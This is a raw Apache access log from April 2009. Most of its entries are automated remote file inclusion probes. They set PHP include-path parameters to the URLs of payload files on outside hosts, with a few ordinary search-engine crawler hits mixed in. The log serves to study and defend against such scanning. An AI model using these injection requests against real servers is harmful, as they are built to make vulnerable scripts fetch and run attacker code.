209.23.122.131 - - [17/Apr/2009:07:07:57 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
209.23.122.131 - - [17/Apr/2009:07:07:57 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
209.23.122.131 - - [17/Apr/2009:07:08:08 -0500] "GET /logs/access_log.1236902400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.home.pt/adpics/id.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:08:26 -0500] "GET /logs//modules/xfsection/modify.php?dir_module=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 317 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:08:26 -0500] "GET //modules/xfsection/modify.php?dir_module=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:08:26 -0500] "GET /logs/access_log.1235692800//modules/xfsection/modify.php?dir_module=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:08:33 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:08:33 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:08:33 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:08:37 -0500] "GET /phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:08:37 -0500] "GET /logs/access_log.1236816000/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:08:37 -0500] "GET /logs/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:08:42 -0500] "GET /logs/access_log.1236902400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:08:47 -0500] "GET /logs/access_log.1236902400/phpffl/phpffl_webfiles/program_files/livedraft/admin.php?PHPFFL_FILE_ROOT=http://www.hitler.h17.ru//gallery/1.gif?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
174.129.130.207 - - [17/Apr/2009:07:08:57 -0500] "GET /robots.txt HTTP/1.0" 404 281 "-""SimilarPages/Nutch-1.0-dev (SimilarPages Nutch Crawler; http://www.similarpages.com; info@similarpages.com)"
174.129.130.207 - - [17/Apr/2009:07:08:57 -0500] "GET /?M=A HTTP/1.0" 200 3233 "-""SimilarPages/Nutch-1.0-dev (SimilarPages Nutch Crawler; http://www.similarpages.com; info@similarpages.com)"
66.90.118.42 - - [17/Apr/2009:07:10:12 -0500] "GET /encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.90.118.42 - - [17/Apr/2009:07:10:12 -0500] "GET /logs/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
66.90.118.42 - - [17/Apr/2009:07:10:12 -0500] "GET /logs/access_log.1238112000/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.90.118.42 - - [17/Apr/2009:07:10:12 -0500] "GET /encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
66.90.118.42 - - [17/Apr/2009:07:10:12 -0500] "GET /logs/access_log.1238112000/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
66.90.118.42 - - [17/Apr/2009:07:10:12 -0500] "GET /logs/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
174.129.130.207 - - [17/Apr/2009:07:10:55 -0500] "GET /_vti_cnf/ HTTP/1.0" 200 664 "-""SimilarPages/Nutch-1.0-dev (SimilarPages Nutch Crawler; http://www.similarpages.com; info@similarpages.com)"
67.153.147.244 - - [17/Apr/2009:07:11:58 -0500] "GET /encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
67.153.147.244 - - [17/Apr/2009:07:11:58 -0500] "GET /logs/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
67.153.147.244 - - [17/Apr/2009:07:11:58 -0500] "GET /logs/access_log.1238112000/encore/forumcgi/display.cgi?preftemp=temp&page=anonymous&file=http://www.look22.de/slideshow/javascript/copyright.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
202.75.4.169 - - [17/Apr/2009:07:15:51 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [17/Apr/2009:07:15:52 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
208.43.71.178 - - [17/Apr/2009:07:20:31 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.820"
208.43.71.178 - - [17/Apr/2009:07:20:32 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.820"
82.141.129.7 - - [17/Apr/2009:07:21:18 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:07:21:18 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
66.249.71.203 - - [17/Apr/2009:07:21:20 -0500] "GET /logs/access_log.1161561600 HTTP/1.1" 304 - "-""Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
66.118.165.42 - - [17/Apr/2009:07:21:35 -0500] "GET //skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.adribessa.com//components/com_sef/1.txt?? HTTP/1.1" 404 331 "-""Mozilla/5.0"
66.118.165.42 - - [17/Apr/2009:07:21:35 -0500] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.adribessa.com//components/com_sef/1.txt?? HTTP/1.1" 404 336 "-""Mozilla/5.0"
66.118.165.42 - - [17/Apr/2009:07:21:35 -0500] "GET /logs/access_log.1233792000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.adribessa.com//components/com_sef/1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
82.141.129.7 - - [17/Apr/2009:07:22:29 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:07:22:30 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:07:22:37 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:07:22:38 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:07:26:03 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:07:26:03 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:07:27:08 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:07:27:08 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idoisir.txt??? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:07:27:46 -0500] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 339 "-""libwww-perl/5.805"
82.141.129.7 - - [17/Apr/2009:07:27:46 -0500] "GET //administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.hajobakker.com/portfolio/idont.txt?? HTTP/1.1" 404 334 "-""libwww-perl/5.805"
65.55.208.136 - - [17/Apr/2009:07:28:59 -0500] "GET /robots.txt HTTP/1.1" 404 293 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
65.55.208.136 - - [17/Apr/2009:07:29:01 -0500] "GET /?D=A HTTP/1.1" 200 3245 "-""msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
66.118.165.42 - - [17/Apr/2009:07:29:26 -0500] "GET /logs/access_log.1233705600//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.adribessa.com//components/com_sef/1.txt?? HTTP/1.1" 404 358 "-""Mozilla/5.0"
64.56.65.106 - - [17/Apr/2009:07:31:17 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.819"
64.56.65.106 - - [17/Apr/2009:07:31:17 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.819"
64.56.65.106 - - [17/Apr/2009:07:32:36 -0500] "GET /logs/includes/ktedit/toolbar.php?dirDepth=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 315 "-""libwww-perl/5.819"
64.56.65.106 - - [17/Apr/2009:07:32:36 -0500] "GET /includes/ktedit/toolbar.php?dirDepth=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 310 "-""libwww-perl/5.819"
65.19.178.235 - - [17/Apr/2009:07:34:19 -0500] "GET /logs/errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
65.19.178.235 - - [17/Apr/2009:07:34:19 -0500] "GET /errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
208.43.71.178 - - [17/Apr/2009:07:38:38 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.820"
208.43.71.178 - - [17/Apr/2009:07:38:38 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.820"
64.56.65.106 - - [17/Apr/2009:07:38:41 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.819"
64.56.65.106 - - [17/Apr/2009:07:38:46 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.819"
64.56.65.106 - - [17/Apr/2009:07:39:29 -0500] "GET /logs/modules/Neos_Chronos/header.php?base_folder=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 319 "-""libwww-perl/5.819"
64.56.65.106 - - [17/Apr/2009:07:39:33 -0500] "GET /modules/Neos_Chronos/header.php?base_folder=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 314 "-""libwww-perl/5.819"
64.202.116.18 - - [17/Apr/2009:07:40:31 -0500] "GET /logs//errors.php?error=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
64.202.116.18 - - [17/Apr/2009:07:40:31 -0500] "GET /logs/access_log.1230249600//errors.php?error=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
64.202.116.18 - - [17/Apr/2009:07:40:31 -0500] "GET //errors.php?error=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
59.21.247.137 - - [17/Apr/2009:07:40:47 -0500] "GET //errors.php?error=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
59.21.247.137 - - [17/Apr/2009:07:40:47 -0500] "GET /logs//errors.php?error=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
59.21.247.137 - - [17/Apr/2009:07:40:47 -0500] "GET /logs/access_log.1230249600//errors.php?error=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
87.106.64.66 - - [17/Apr/2009:07:40:58 -0500] "GET ///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shn.be//components/id.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
87.106.64.66 - - [17/Apr/2009:07:40:59 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shn.be//components/id.txt?? HTTP/1.1" 404 340 "-""Mozilla/5.0"
87.106.64.66 - - [17/Apr/2009:07:40:59 -0500] "GET /logs/access_log.1236729600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.shn.be//components/id.txt?? HTTP/1.1" 404 362 "-""Mozilla/5.0"
62.44.79.35 - - [17/Apr/2009:07:41:37 -0500] "GET //?sIncPath=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
62.44.79.35 - - [17/Apr/2009:07:41:37 -0500] "GET /logs/access_log.1233964800//?sIncPath=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
62.44.79.35 - - [17/Apr/2009:07:41:40 -0500] "GET /logs//?sIncPath=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 200 185886 "-""Mozilla/5.0"
211.43.212.111 - - [17/Apr/2009:07:42:01 -0500] "GET /logs/access_log.1236643200/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://jamur.ucoz.com/id2.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
211.43.212.111 - - [17/Apr/2009:07:42:01 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://jamur.ucoz.com/id2.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
211.43.212.111 - - [17/Apr/2009:07:42:01 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://jamur.ucoz.com/id2.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
65.19.178.235 - - [17/Apr/2009:07:42:08 -0500] "GET /logs/access_log.1228608000/errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 320 "-""libwww-perl/5.812"
65.19.178.235 - - [17/Apr/2009:07:42:08 -0500] "GET /errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
65.19.178.235 - - [17/Apr/2009:07:42:08 -0500] "GET /logs/errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
211.43.212.111 - - [17/Apr/2009:07:43:19 -0500] "GET /logs/access_log.1236988800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://jamur.ucoz.com/id2.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
208.43.71.178 - - [17/Apr/2009:07:43:45 -0500] "GET /logs/include/lib.inc.php?site_path=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.820"
208.43.71.178 - - [17/Apr/2009:07:43:45 -0500] "GET /include/lib.inc.php?site_path=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.820"
72.10.167.2 - - [17/Apr/2009:07:46:32 -0500] "GET /logs//bbshop/admin/admin.php/?_shop_path=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
72.10.167.2 - - [17/Apr/2009:07:46:32 -0500] "GET //bbshop/admin/admin.php/?_shop_path=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
72.10.167.2 - - [17/Apr/2009:07:46:32 -0500] "GET /logs/access_log.1231027200//bbshop/admin/admin.php/?_shop_path=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
72.10.167.2 - - [17/Apr/2009:07:46:45 -0500] "GET /logs/access_log.1234396800//bbshop/admin/admin.php/?_shop_path=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
202.75.4.169 - - [17/Apr/2009:07:46:52 -0500] "GET /logs/errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 298 "-""libwww-perl/5.79"
202.75.4.169 - - [17/Apr/2009:07:46:52 -0500] "GET /errors.php?error=http://home.covenantberks.org/images/kampret.jpg?? HTTP/1.1" 404 293 "-""libwww-perl/5.79"
83.138.144.89 - - [17/Apr/2009:07:46:55 -0500] "GET /logs/access_log.1236297600///?commonpath=http://olesya.biz/aJz.txt? HTTP/1.1" 404 312 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:46:55 -0500] "GET ///?commonpath=http://olesya.biz/aJz.txt? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
83.138.144.89 - - [17/Apr/2009:07:46:56 -0500] "GET /logs///?commonpath=http://olesya.biz/aJz.txt? HTTP/1.1" 200 185887 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:07:46:57 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:07:46:57 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:07:46:57 -0500] "GET /logs/access_log.1236643200/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
64.15.159.42 - - [17/Apr/2009:07:46:57 -0500] "GET //?sIncPath=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
64.15.159.42 - - [17/Apr/2009:07:46:57 -0500] "GET /logs/access_log.1233964800//?sIncPath=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
64.15.159.42 - - [17/Apr/2009:07:46:58 -0500] "GET /logs//?sIncPath=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 200 185886 "-""Mozilla/5.0"
64.15.159.42 - - [17/Apr/2009:07:47:04 -0500] "GET /logs/access_log.1234656000//?sIncPath=http://compraloenlinea.com.mx//copyright[1].txt??? HTTP/1.1" 404 311 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:07:47:13 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 344 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:07:47:13 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 339 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:07:47:13 -0500] "GET /logs/access_log.1236643200/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:07:47:31 -0500] "GET /logs/access_log.1236988800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
77.221.130.18 - - [17/Apr/2009:07:47:49 -0500] "GET /logs/access_log.1236988800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt? HTTP/1.1" 404 366 "-""Mozilla/5.0"
218.246.20.221 - - [17/Apr/2009:07:47:56 -0500] "GET /logs///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 340 "-""Mozilla/5.0"
218.246.20.221 - - [17/Apr/2009:07:47:58 -0500] "GET /logs/access_log.1236729600///components/com_virtuemart/show_image_in_imgtag.php?mosConfig_absolute_path=http://www.sanagustin.edu.bo/modules/copyright.txt? HTTP/1.1" 404 362 "-""Mozilla/5.0"
64.202.116.18 - - [17/Apr/2009:07:48:20 -0500] "GET //bbshop/admin/admin.php/?_shop_path=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
64.202.116.18 - - [17/Apr/2009:07:48:20 -0500] "GET /logs//bbshop/admin/admin.php/?_shop_path=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
64.202.116.18 - - [17/Apr/2009:07:48:20 -0500] "GET /logs/access_log.1231027200//bbshop/admin/admin.php/?_shop_path=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
64.202.116.18 - - [17/Apr/2009:07:48:43 -0500] "GET /logs/access_log.1234396800//bbshop/admin/admin.php/?_shop_path=http://www.light-world.com/modules/mod_jflanguageselection/idxx.txt?? HTTP/1.1" 404 334 "-""Mozilla/5.0"
210.109.101.217 - - [17/Apr/2009:07:49:02 -0500] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 339 "-""Mozilla/5.0"
210.109.101.217 - - [17/Apr/2009:07:49:02 -0500] "GET /logs/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 344 "-""Mozilla/5.0"
210.109.101.217 - - [17/Apr/2009:07:49:02 -0500] "GET /logs/access_log.1236643200/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
210.109.101.217 - - [17/Apr/2009:07:50:08 -0500] "GET /logs/access_log.1236988800/modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://zonadeclientes.com/id1.txt?? HTTP/1.1" 404 366 "-""Mozilla/5.0"
218.27.203.107 - - [17/Apr/2009:07:50:27 -0500] "GET /logs/access_log.1236297600///?commonpath=http://gumansin.com/pds/1.txt?? HTTP/1.1" 404 312 "-""Mozilla/5.0"
218.27.203.107 - - [17/Apr/2009:07:50:27 -0500] "GET ///?commonpath=http://gumansin.com/pds/1.txt?? HTTP/1.1" 200 3246 "-""Mozilla/5.0"
218.27.203.107 - - [17/Apr/2009:07:50:30 -0500] "GET /logs///?commonpath=http://gumansin.com/pds/1.txt?? HTTP/1.1" 200 185887 "-""Mozilla/5.0"
64.56.65.106 - - [17/Apr/2009:07:51:00 -0500] "GET /logs/include/lib.inc.php?site_path=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.819"
64.56.65.106 - - [17/Apr/2009:07:51:00 -0500] "GET /include/lib.inc.php?site_path=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.819"
65.19.178.235 - - [17/Apr/2009:07:51:28 -0500] "GET /logs/errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 298 "-""libwww-perl/5.812"
65.19.178.235 - - [17/Apr/2009:07:51:28 -0500] "GET /errors.php?error=http://www.indians.org/sidebar/chi.txt?? HTTP/1.1" 404 293 "-""libwww-perl/5.812"
87.106.64.66 - - [17/Apr/2009:07:51:34 -0500] "GET /?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
87.106.64.66 - - [17/Apr/2009:07:51:34 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.106.64.66 - - [17/Apr/2009:07:51:34 -0500] "GET /logs/access_log.1235692800/?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.106.64.66 - - [17/Apr/2009:07:51:35 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 200 185881 "-""Mozilla/5.0"
64.56.65.106 - - [17/Apr/2009:07:51:59 -0500] "GET /logs/include/lib.inc.php?site_path=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 307 "-""libwww-perl/5.819"
64.56.65.106 - - [17/Apr/2009:07:51:59 -0500] "GET /include/lib.inc.php?site_path=http://gelora.hostse.com/gid.txt??? HTTP/1.1" 404 302 "-""libwww-perl/5.819"
81.176.226.164 - - [17/Apr/2009:07:55:00 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
81.176.226.164 - - [17/Apr/2009:07:55:01 -0500] "GET /?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
81.176.226.164 - - [17/Apr/2009:07:55:03 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 200 185881 "-""Mozilla/5.0"
87.106.64.66 - - [17/Apr/2009:07:55:18 -0500] "GET /?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 200 3245 "-""Mozilla/5.0"
87.106.64.66 - - [17/Apr/2009:07:55:18 -0500] "GET /logs/access_log.1236297600/?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.106.64.66 - - [17/Apr/2009:07:55:19 -0500] "GET /logs/access_log.1235692800/?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 404 310 "-""Mozilla/5.0"
87.106.64.66 - - [17/Apr/2009:07:55:19 -0500] "GET /logs/?DOCUMENT_ROOT=http://www.shn.be//components/id.txt?? HTTP/1.1" 200 185881 "-""Mozilla/5.0"
